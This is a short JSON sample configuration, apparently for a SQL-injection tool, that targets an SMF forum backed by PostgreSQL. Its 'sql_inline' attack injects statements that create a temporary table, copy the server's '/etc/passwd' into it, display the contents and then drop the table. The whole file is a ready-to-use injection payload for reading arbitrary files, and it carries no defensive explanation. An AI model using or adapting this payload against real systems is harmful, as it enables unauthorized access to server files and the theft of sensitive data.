# This sample assumes a postgres database. Read and display arbitrary
# data from a file.
[
    {
        "attack": "sql_inline",
        "base_url": "http://smf-server/forum/index.php",
        "attribute": "inline",
        "statements": [
            "create table tmpread (line text)",
            "copy tmpread from '/etc/passwd'",
            "select * from tmpread",
            "drop table tmpread"
        ]
    }
]
